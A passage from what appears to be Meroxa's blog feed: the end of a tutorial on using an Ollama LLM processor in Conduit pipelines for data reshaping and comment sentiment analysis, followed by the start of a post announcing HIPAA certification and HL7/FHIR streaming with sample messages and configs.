  &lt;span class=&quot;token number&quot;&gt;7&lt;/span&gt; &lt;span class=&quot;token operator&quot;&gt;|&lt;/span&gt; Sir Arthur &lt;span class=&quot;token operator&quot;&gt;|&lt;/span&gt; Conan Doyle &lt;span class=&quot;token operator&quot;&gt;|&lt;/span&gt;          &lt;span class=&quot;token number&quot;&gt;1859&lt;/span&gt; &lt;span class=&quot;token operator&quot;&gt;|&lt;/span&gt; The Adventures &lt;span class=&quot;token keyword&quot;&gt;of&lt;/span&gt; Sherlock Holmes
  &lt;span class=&quot;token number&quot;&gt;8&lt;/span&gt; &lt;span class=&quot;token operator&quot;&gt;|&lt;/span&gt; Ray        &lt;span class=&quot;token operator&quot;&gt;|&lt;/span&gt; Bradbury    &lt;span class=&quot;token operator&quot;&gt;|&lt;/span&gt;          &lt;span class=&quot;token number&quot;&gt;1920&lt;/span&gt; &lt;span class=&quot;token operator&quot;&gt;|&lt;/span&gt; Fahrenheit &lt;span class=&quot;token number&quot;&gt;451&lt;/span&gt;
  &lt;span class=&quot;token number&quot;&gt;9&lt;/span&gt; &lt;span class=&quot;token operator&quot;&gt;|&lt;/span&gt; L          &lt;span class=&quot;token operator&quot;&gt;|&lt;/span&gt; Frank Baum  &lt;span class=&quot;token operator&quot;&gt;|&lt;/span&gt;          &lt;span class=&quot;token number&quot;&gt;1856&lt;/span&gt; &lt;span class=&quot;token operator&quot;&gt;|&lt;/span&gt; Wizard &lt;span class=&quot;token keyword&quot;&gt;of&lt;/span&gt; Oz
 &lt;span class=&quot;token number&quot;&gt;10&lt;/span&gt; &lt;span class=&quot;token operator&quot;&gt;|&lt;/span&gt; charles    &lt;span class=&quot;token operator&quot;&gt;|&lt;/span&gt; darwin      &lt;span class=&quot;token operator&quot;&gt;|&lt;/span&gt;          &lt;span class=&quot;token number&quot;&gt;1809&lt;/span&gt; &lt;span class=&quot;token operator&quot;&gt;|&lt;/span&gt; Origin &lt;span class=&quot;token keyword&quot;&gt;of&lt;/span&gt; Species&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;This example shows how the Ollama processor transformed the data according to the requirements specified in our prompt. The processor successfully:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Split the full name into first and last name components&lt;/li&gt;
&lt;li&gt;Calculated the year of birth based on the provided age&lt;/li&gt;
&lt;li&gt;Maintained the original book information&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;We can see that the data has mostly been properly restructured to match the new schema; however, the model has made a few choices that are not desired (like adding a &lt;em&gt;Sir&lt;/em&gt; to Arthur Conan Doyle), so I will need to edit my prompt accordingly.&lt;/p&gt;
&lt;h3&gt;AI Sentiment Analysis&lt;/h3&gt;
&lt;p&gt;In this example, I am looking at a cooking blog after I released a new cooking video. I am parsing various comments to determine feedback that I can act on for my next video.&lt;/p&gt;
&lt;p&gt;I need to ask the model to copy the comment to my new table, extract any appropriate feedback, and give a sentiment analysis of the comment.&lt;/p&gt;
&lt;p&gt;This is my sample Conduit pipeline configuration.&lt;/p&gt;
&lt;div class=&quot;gatsby-highlight&quot; data-language=&quot;yaml&quot;&gt;&lt;pre class=&quot;language-yaml&quot;&gt;&lt;code class=&quot;language-yaml&quot;&gt;&lt;span class=&quot;token key atrule&quot;&gt;version&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;token number&quot;&gt;2.2&lt;/span&gt;
&lt;span class=&quot;token key atrule&quot;&gt;pipelines&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt;
&lt;span class=&quot;token punctuation&quot;&gt;-&lt;/span&gt; &lt;span class=&quot;token key atrule&quot;&gt;id&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt; ollama&lt;span class=&quot;token punctuation&quot;&gt;-&lt;/span&gt;feedback
  &lt;span class=&quot;token key atrule&quot;&gt;status&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt; running
  &lt;span class=&quot;token key atrule&quot;&gt;connectors&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt;
    &lt;span class=&quot;token punctuation&quot;&gt;-&lt;/span&gt; &lt;span class=&quot;token key atrule&quot;&gt;id&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt; source&lt;span class=&quot;token punctuation&quot;&gt;-&lt;/span&gt;connector&lt;span class=&quot;token punctuation&quot;&gt;-&lt;/span&gt;&lt;span class=&quot;token number&quot;&gt;1&lt;/span&gt;
      &lt;span class=&quot;token key atrule&quot;&gt;type&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt; source
      &lt;span class=&quot;token key atrule&quot;&gt;plugin&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt; builtin&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt;postgres
      &lt;span class=&quot;token key atrule&quot;&gt;settings&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt;
        &lt;span class=&quot;token key atrule&quot;&gt;tables&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;token string&quot;&gt;&quot;blog_comment&quot;&lt;/span&gt;
        &lt;span class=&quot;token key atrule&quot;&gt;url&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;token string&quot;&gt;&quot;postgres://username:password@localhost:5433/client1?sslmode=disable&quot;&lt;/span&gt;
    &lt;span class=&quot;token punctuation&quot;&gt;-&lt;/span&gt; &lt;span class=&quot;token key atrule&quot;&gt;id&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt; dest&lt;span class=&quot;token punctuation&quot;&gt;-&lt;/span&gt;connector&lt;span class=&quot;token punctuation&quot;&gt;-&lt;/span&gt;&lt;span class=&quot;token number&quot;&gt;1&lt;/span&gt;
      &lt;span class=&quot;token key atrule&quot;&gt;type&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt; destination
      &lt;span class=&quot;token key atrule&quot;&gt;plugin&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt; builtin&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt;postgres
      &lt;span class=&quot;token key atrule&quot;&gt;settings&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt;
        &lt;span class=&quot;token key atrule&quot;&gt;url&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;token string&quot;&gt;&quot;postgres://username:password@localhost:5433/client2?sslmode=disable&quot;&lt;/span&gt;
        &lt;span class=&quot;token key atrule&quot;&gt;table&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;token string&quot;&gt;&quot;feedback&quot;&lt;/span&gt;
  &lt;span class=&quot;token key atrule&quot;&gt;processors&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt;
    &lt;span class=&quot;token punctuation&quot;&gt;-&lt;/span&gt; &lt;span class=&quot;token key atrule&quot;&gt;id&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt; ollama&lt;span class=&quot;token punctuation&quot;&gt;-&lt;/span&gt;processor&lt;span class=&quot;token punctuation&quot;&gt;-&lt;/span&gt;&lt;span class=&quot;token number&quot;&gt;1&lt;/span&gt;
      &lt;span class=&quot;token key atrule&quot;&gt;plugin&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt; builtin&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt;ollama
      &lt;span class=&quot;token key atrule&quot;&gt;settings&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt;
        &lt;span class=&quot;token key atrule&quot;&gt;url&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;token string&quot;&gt;&quot;http://127.0.0.1:11434&quot;&lt;/span&gt;
        &lt;span class=&quot;token key atrule&quot;&gt;model&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;token string&quot;&gt;&quot;llama3.2&quot;&lt;/span&gt;
        &lt;span class=&quot;token key atrule&quot;&gt;prompt&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;token punctuation&quot;&gt;&gt;&lt;/span&gt;&lt;span class=&quot;token scalar string&quot;&gt;
          Take the given input, and put the information into the following format:
          {
            &quot;raw_content&quot;: &quot;something&quot;,
            &quot;feedback&quot;: &quot;something&quot;,
            &quot;sentiment&quot;: &quot;negative&quot;,
          }
          The raw_content field should be filled with the information from &quot;content&quot; in the form of a string.            
          The feedback field should contain a string of any information said in the content field that is      
          something that could be done to improve.
          The sentiment field should be a string of either postive, negative, or neutral.&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;After I have run the pipeline, the state of my data is shown below.&lt;/p&gt;
&lt;div class=&quot;gatsby-highlight&quot; data-language=&quot;sql&quot;&gt;&lt;pre class=&quot;language-sql&quot;&gt;&lt;code class=&quot;language-sql&quot;&gt; id &lt;span class=&quot;token operator&quot;&gt;|&lt;/span&gt;    name    &lt;span class=&quot;token operator&quot;&gt;|&lt;/span&gt;                              content                              &lt;span class=&quot;token operator&quot;&gt;|&lt;/span&gt;       creation_date
&lt;span class=&quot;token comment&quot;&gt;----+------------+-------------------------------------------------------------------+----------------------------&lt;/span&gt;
  &lt;span class=&quot;token number&quot;&gt;1&lt;/span&gt; &lt;span class=&quot;token operator&quot;&gt;|&lt;/span&gt; username01 &lt;span class=&quot;token operator&quot;&gt;|&lt;/span&gt; This was so helpful&lt;span class=&quot;token operator&quot;&gt;!&lt;/span&gt; Thanks&lt;span class=&quot;token operator&quot;&gt;!&lt;/span&gt;&lt;span class=&quot;token operator&quot;&gt;!&lt;/span&gt;                                     &lt;span class=&quot;token operator&quot;&gt;|&lt;/span&gt; &lt;span class=&quot;token number&quot;&gt;2025&lt;/span&gt;&lt;span class=&quot;token operator&quot;&gt;-&lt;/span&gt;&lt;span class=&quot;token number&quot;&gt;03&lt;/span&gt;&lt;span class=&quot;token operator&quot;&gt;-&lt;/span&gt;&lt;span class=&quot;token number&quot;&gt;28&lt;/span&gt; &lt;span class=&quot;token number&quot;&gt;12&lt;/span&gt;:&lt;span class=&quot;token number&quot;&gt;29&lt;/span&gt;:&lt;span class=&quot;token number&quot;&gt;08.957372&lt;/span&gt;
  &lt;span class=&quot;token number&quot;&gt;2&lt;/span&gt; &lt;span class=&quot;token operator&quot;&gt;|&lt;/span&gt; username02 &lt;span class=&quot;token operator&quot;&gt;|&lt;/span&gt; I hated that&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt; Should have been &lt;span class=&quot;token number&quot;&gt;6&lt;/span&gt; min shorter                      &lt;span class=&quot;token operator&quot;&gt;|&lt;/span&gt; &lt;span class=&quot;token number&quot;&gt;2025&lt;/span&gt;&lt;span class=&quot;token operator&quot;&gt;-&lt;/span&gt;&lt;span class=&quot;token number&quot;&gt;03&lt;/span&gt;&lt;span class=&quot;token operator&quot;&gt;-&lt;/span&gt;&lt;span class=&quot;token number&quot;&gt;28&lt;/span&gt; &lt;span class=&quot;token number&quot;&gt;12&lt;/span&gt;:&lt;span class=&quot;token number&quot;&gt;29&lt;/span&gt;:&lt;span class=&quot;token number&quot;&gt;08.957372&lt;/span&gt;
  &lt;span class=&quot;token number&quot;&gt;3&lt;/span&gt; &lt;span class=&quot;token operator&quot;&gt;|&lt;/span&gt; username03 &lt;span class=&quot;token operator&quot;&gt;|&lt;/span&gt; Good video&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt; Adding &lt;span class=&quot;token keyword&quot;&gt;some&lt;/span&gt; ginger &lt;span class=&quot;token keyword&quot;&gt;to&lt;/span&gt; the recipe would make it better &lt;span class=&quot;token operator&quot;&gt;|&lt;/span&gt; &lt;span class=&quot;token number&quot;&gt;2025&lt;/span&gt;&lt;span class=&quot;token operator&quot;&gt;-&lt;/span&gt;&lt;span class=&quot;token number&quot;&gt;03&lt;/span&gt;&lt;span class=&quot;token operator&quot;&gt;-&lt;/span&gt;&lt;span class=&quot;token number&quot;&gt;28&lt;/span&gt; &lt;span class=&quot;token number&quot;&gt;12&lt;/span&gt;:&lt;span class=&quot;token number&quot;&gt;29&lt;/span&gt;:&lt;span class=&quot;token number&quot;&gt;08.957372&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;div class=&quot;gatsby-highlight&quot; data-language=&quot;sql&quot;&gt;&lt;pre class=&quot;language-sql&quot;&gt;&lt;code class=&quot;language-sql&quot;&gt; id &lt;span class=&quot;token operator&quot;&gt;|&lt;/span&gt;                            raw_content                            &lt;span class=&quot;token operator&quot;&gt;|&lt;/span&gt;             feedback             &lt;span class=&quot;token operator&quot;&gt;|&lt;/span&gt; sentiment
&lt;span class=&quot;token comment&quot;&gt;----+-------------------------------------------------------------------+----------------------------------+-----------&lt;/span&gt;
  &lt;span class=&quot;token number&quot;&gt;1&lt;/span&gt; &lt;span class=&quot;token operator&quot;&gt;|&lt;/span&gt; This was so helpful&lt;span class=&quot;token operator&quot;&gt;!&lt;/span&gt; Thanks&lt;span class=&quot;token operator&quot;&gt;!&lt;/span&gt;&lt;span class=&quot;token operator&quot;&gt;!&lt;/span&gt;                                     &lt;span class=&quot;token operator&quot;&gt;|&lt;/span&gt;                                  &lt;span class=&quot;token operator&quot;&gt;|&lt;/span&gt; positive
  &lt;span class=&quot;token number&quot;&gt;2&lt;/span&gt; &lt;span class=&quot;token operator&quot;&gt;|&lt;/span&gt; I hated that&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt; Should have been &lt;span class=&quot;token number&quot;&gt;6&lt;/span&gt; min shorter                      &lt;span class=&quot;token operator&quot;&gt;|&lt;/span&gt; Should have been &lt;span class=&quot;token number&quot;&gt;6&lt;/span&gt; min shorter   &lt;span class=&quot;token operator&quot;&gt;|&lt;/span&gt; negative
  &lt;span class=&quot;token number&quot;&gt;3&lt;/span&gt; &lt;span class=&quot;token operator&quot;&gt;|&lt;/span&gt; Good video&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt; Adding &lt;span class=&quot;token keyword&quot;&gt;some&lt;/span&gt; ginger &lt;span class=&quot;token keyword&quot;&gt;to&lt;/span&gt; the recipe would make it better &lt;span class=&quot;token operator&quot;&gt;|&lt;/span&gt; Adding &lt;span class=&quot;token keyword&quot;&gt;some&lt;/span&gt; ginger &lt;span class=&quot;token keyword&quot;&gt;to&lt;/span&gt; the recipe &lt;span class=&quot;token operator&quot;&gt;|&lt;/span&gt; positive&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;Here we can see the processor successfully:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;moved the data from &lt;code class=&quot;language-text&quot;&gt;comments&lt;/code&gt; in original table to &lt;code class=&quot;language-text&quot;&gt;feedback&lt;/code&gt; in our new table&lt;/li&gt;
&lt;li&gt;extracted any feedback from the original comment&lt;/li&gt;
&lt;li&gt;determined whether the feedback is positive or negative&lt;/li&gt;
&lt;/ul&gt;
&lt;h2&gt;Conclusion&lt;/h2&gt;
&lt;p&gt;The Ollama processor allows users a variety of new possibilities to data processing. Whether cleaning, enriching, or analyzing data, your Conduit pipelines now have a variety of ways to interact with your data.&lt;/p&gt;
&lt;p&gt;Please try out the new Ollama processor for your own use cases, and let us know how the results by joining our &lt;a href=&quot;https://discord.meroxa.com/&quot;&gt;Discord&lt;/a&gt; server.&lt;/p&gt;</content:encoded></item><item><title><![CDATA[Real-Time Healthcare, Without the Wait: Meroxa is Now HIPAA Certified]]></title><description><![CDATA[Meroxa is now HIPAA certified, offering real-time HL7 and FHIR data streaming to modernize healthcare workflows, boost compliance, and power AI.]]></description><link>https://meroxa.com/blog/real-time-healthcare-without-the-wait-meroxa-is-now-hipaa-certified</link><guid isPermaLink="false">https://meroxa.com/blog/real-time-healthcare-without-the-wait-meroxa-is-now-hipaa-certified</guid><dc:creator><![CDATA[DeVaris Brown]]></dc:creator><pubDate>Wed, 04 Jun 2025 09:32:00 GMT</pubDate><content:encoded>&lt;p&gt;Healthcare shouldn’t have a lag time.&lt;/p&gt;
&lt;p&gt;But across hospitals, clinics, and digital health platforms, data still moves like it’s 2004—slow, siloed, and stuck in outdated workflows. A patient is admitted, but the specialist won’t see the file for days. A lab result is finalized, but no system knows what to do with it.&lt;/p&gt;
&lt;p&gt;That changes now.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Meroxa is officially HIPAA certified&lt;/strong&gt;, and we’ve built native processors for &lt;strong&gt;HL7 and FHIR&lt;/strong&gt;—the dominant healthcare data formats. That means you can stream, transform, and act on clinical data the moment it’s created.&lt;/p&gt;
&lt;p&gt;No more waiting. No more manual handoffs. Just secure, real-time healthcare infrastructure that works.&lt;/p&gt;
&lt;hr&gt;
&lt;h2&gt;🧬 The Real World Still Runs on HL7&lt;/h2&gt;
&lt;p&gt;HL7 v2 is the backbone of U.S. healthcare data. It powers:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;ADT (Admission/Discharge/Transfer) events&lt;/li&gt;
&lt;li&gt;Lab results&lt;/li&gt;
&lt;li&gt;Pharmacy orders&lt;/li&gt;
&lt;li&gt;Billing workflows&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;But developers know the struggle: pipe-delimited fields, cryptic segment codes, and brittle custom integrations.&lt;/p&gt;
&lt;div class=&quot;gatsby-highlight&quot; data-language=&quot;bash&quot;&gt;&lt;pre class=&quot;language-bash&quot;&gt;&lt;code class=&quot;language-bash&quot;&gt;MSH&lt;span class=&quot;token operator&quot;&gt;|&lt;/span&gt;^~&lt;span class=&quot;token punctuation&quot;&gt;\&lt;/span&gt;&lt;span class=&quot;token operator&quot;&gt;&amp;amp;&lt;/span&gt;&lt;span class=&quot;token operator&quot;&gt;|&lt;/span&gt;LABHOST&lt;span class=&quot;token operator&quot;&gt;|&lt;/span&gt;LAB&lt;span class=&quot;token operator&quot;&gt;|&lt;/span&gt;CIS&lt;span class=&quot;token operator&quot;&gt;|&lt;/span&gt;CIS&lt;span class=&quot;token operator&quot;&gt;|&lt;/span&gt;&lt;span class=&quot;token number&quot;&gt;202402041030&lt;/span&gt;&lt;span class=&quot;token operator&quot;&gt;||&lt;/span&gt;ORU^R01&lt;span class=&quot;token operator&quot;&gt;|&lt;/span&gt;&lt;span class=&quot;token number&quot;&gt;12345&lt;/span&gt;&lt;span class=&quot;token operator&quot;&gt;|&lt;/span&gt;P&lt;span class=&quot;token operator&quot;&gt;|&lt;/span&gt;&lt;span class=&quot;token number&quot;&gt;2.3&lt;/span&gt;
PID&lt;span class=&quot;token operator&quot;&gt;||&lt;/span&gt;&lt;span class=&quot;token operator&quot;&gt;|&lt;/span&gt;PATID1234^5^M11&lt;span class=&quot;token operator&quot;&gt;||&lt;/span&gt;JONES^WILLIAM^A^III&lt;span class=&quot;token operator&quot;&gt;||&lt;/span&gt;&lt;span class=&quot;token number&quot;&gt;19610615&lt;/span&gt;&lt;span class=&quot;token operator&quot;&gt;|&lt;/span&gt;M
OBR&lt;span class=&quot;token operator&quot;&gt;|&lt;/span&gt;&lt;span class=&quot;token number&quot;&gt;1&lt;/span&gt;&lt;span class=&quot;token operator&quot;&gt;|&lt;/span&gt;&lt;span class=&quot;token number&quot;&gt;8642753100012&lt;/span&gt;^LIS&lt;span class=&quot;token operator&quot;&gt;|&lt;/span&gt;&lt;span class=&quot;token number&quot;&gt;20809880170&lt;/span&gt;^EHR&lt;span class=&quot;token operator&quot;&gt;|&lt;/span&gt;&lt;span class=&quot;token number&quot;&gt;93000&lt;/span&gt;^ECHOCARDIOGRAM^^93000
OBX&lt;span class=&quot;token operator&quot;&gt;|&lt;/span&gt;&lt;span class=&quot;token number&quot;&gt;1&lt;/span&gt;&lt;span class=&quot;token operator&quot;&gt;|&lt;/span&gt;ST&lt;span class=&quot;token operator&quot;&gt;|&lt;/span&gt;&lt;span class=&quot;token number&quot;&gt;93000&lt;/span&gt;^ECHOCARDIOGRAM&lt;span class=&quot;token operator&quot;&gt;||&lt;/span&gt;NORMAL&lt;span class=&quot;token operator&quot;&gt;||&lt;/span&gt;&lt;span class=&quot;token operator&quot;&gt;|&lt;/span&gt;N&lt;span class=&quot;token operator&quot;&gt;||&lt;/span&gt;F&lt;span class=&quot;token operator&quot;&gt;||&lt;/span&gt;&lt;span class=&quot;token operator&quot;&gt;|&lt;/span&gt;&lt;span class=&quot;token number&quot;&gt;202402041025&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;It’s powerful, yes—but it wasn’t built for real-time AI or modern APIs.&lt;/p&gt;
&lt;hr&gt;
&lt;h2&gt;⚡ Enter FHIR—and Meroxa&lt;/h2&gt;
&lt;p&gt;FHIR (Fast Healthcare Interoperability Resources) adoption is accelerating, with global regulatory backing and growing adoption among health tech companies. It’s modern, flexible, and machine-readable as seen below:&lt;/p&gt;
&lt;div class=&quot;gatsby-highlight&quot; data-language=&quot;json&quot;&gt;&lt;pre class=&quot;language-json&quot;&gt;&lt;code class=&quot;language-json&quot;&gt;&lt;span class=&quot;token punctuation&quot;&gt;{&lt;/span&gt;
  &lt;span class=&quot;token property&quot;&gt;&quot;resourceType&quot;&lt;/span&gt;&lt;span class=&quot;token operator&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;token string&quot;&gt;&quot;Patient&quot;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt;
  &lt;span class=&quot;token property&quot;&gt;&quot;identifier&quot;&lt;/span&gt;&lt;span class=&quot;token operator&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;token punctuation&quot;&gt;[&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;{&lt;/span&gt;
    &lt;span class=&quot;token property&quot;&gt;&quot;system&quot;&lt;/span&gt;&lt;span class=&quot;token operator&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;token string&quot;&gt;&quot;urn:oid:1.2.36.146.595.217.0.1&quot;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt;
    &lt;span class=&quot;token property&quot;&gt;&quot;value&quot;&lt;/span&gt;&lt;span class=&quot;token operator&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;token string&quot;&gt;&quot;12345&quot;&lt;/span&gt;
  &lt;span class=&quot;token punctuation&quot;&gt;}&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;]&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt;
  &lt;span class=&quot;token property&quot;&gt;&quot;name&quot;&lt;/span&gt;&lt;span class=&quot;token operator&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;token punctuation&quot;&gt;[&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;{&lt;/span&gt;
    &lt;span class=&quot;token property&quot;&gt;&quot;family&quot;&lt;/span&gt;&lt;span class=&quot;token operator&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;token string&quot;&gt;&quot;Smith&quot;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt;
    &lt;span class=&quot;token property&quot;&gt;&quot;given&quot;&lt;/span&gt;&lt;span class=&quot;token operator&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;token punctuation&quot;&gt;[&lt;/span&gt;&lt;span class=&quot;token string&quot;&gt;&quot;John&quot;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;]&lt;/span&gt;
  &lt;span class=&quot;token punctuation&quot;&gt;}&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;]&lt;/span&gt;
&lt;span class=&quot;token punctuation&quot;&gt;}&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;But HL7 isn’t going away anytime soon.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Meroxa’s Conduit platform handles both&lt;/strong&gt;, streaming HL7 v2 or FHIR in real time, with automatic bidirectional translation between the two formats.&lt;/p&gt;
&lt;p&gt;Your systems speak different languages. We make them fluent.&lt;/p&gt;
&lt;hr&gt;
&lt;h2&gt;📉 From 5 Days to 10 Seconds&lt;/h2&gt;
&lt;p&gt;A US-based national healthcare provider came to us with a familiar challenge: HL7 files dropped onto an SFTP server, sent in batches, processed by custom scripts. On average, it took &lt;strong&gt;2–5 days&lt;/strong&gt; to get data into their downstream systems.&lt;/p&gt;
&lt;p&gt;With Meroxa, we replaced all of it with a real-time pipeline:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;HL7 messages were detected instantly&lt;/li&gt;
&lt;li&gt;Transformed to FHIR on the fly&lt;/li&gt;
&lt;li&gt;Synced to PostgreSQL, Oracle, and Databricks—in seconds&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;No new infrastructure. No code rewrites. Just faster, better care delivery.&lt;/p&gt;
&lt;hr&gt;
&lt;h2&gt;🔄 Under the Hood&lt;/h2&gt;
&lt;p&gt;Meroxa + Conduit gives you:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;strong&gt;Live HL7↔FHIR conversion&lt;/strong&gt; via a single processor&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Low-code pipeline builder&lt;/strong&gt; with YAML support for custom workflows&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Exactly-once delivery&lt;/strong&gt;, with built-in dead-letter queues&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Cloud-agnostic deployment&lt;/strong&gt; (AWS, Azure, GCP)&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Streaming + batch support&lt;/strong&gt;, scaled to 70,000+ msgs/sec&lt;/li&gt;
&lt;/ul&gt;
&lt;div class=&quot;gatsby-highlight&quot; data-language=&quot;yaml&quot;&gt;&lt;pre class=&quot;language-yaml&quot;&gt;&lt;code class=&quot;language-yaml&quot;&gt;&lt;span class=&quot;token punctuation&quot;&gt;-&lt;/span&gt; &lt;span class=&quot;token key atrule&quot;&gt;id&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt; hl7&lt;span class=&quot;token punctuation&quot;&gt;-&lt;/span&gt;fhir&lt;span class=&quot;token punctuation&quot;&gt;-&lt;/span&gt;processor
  &lt;span class=&quot;token key atrule&quot;&gt;plugin&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt; conduit&lt;span class=&quot;token punctuation&quot;&gt;-&lt;/span&gt;processor&lt;span class=&quot;token punctuation&quot;&gt;-&lt;/span&gt;hl7
  &lt;span class=&quot;token key atrule&quot;&gt;settings&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt;
    &lt;span class=&quot;token key atrule&quot;&gt;inputType&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt; hl7
    &lt;span class=&quot;token key atrule&quot;&gt;outputType&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt; fhir&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;h2&gt;&lt;strong&gt;Live Demo: Multi-Destination Healthcare Data Pipeline&lt;/strong&gt;&lt;/h2&gt;
&lt;p&gt;To demonstrate how Conduit tackles healthcare data challenges, let&apos;s walk through building a complete data pipeline that processes HL7 data in real-time. Here’s the architecture of what we’ll be building:&lt;/p&gt;
&lt;p&gt;&lt;span
      class=&quot;gatsby-resp-image-wrapper&quot;
      style=&quot;position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 800px; &quot;
    &gt;
      &lt;a
    class=&quot;gatsby-resp-image-link&quot;
    href=&quot;/static/cd188879b80803483f9d53d444a6fa35/a5c81/mermaid-diagram-2025-06-04-095001.png&quot;
    style=&quot;display: block&quot;
    target=&quot;_blank&quot;
    rel=&quot;noopener&quot;
  &gt;
    &lt;span
    class=&quot;gatsby-resp-image-background-image&quot;
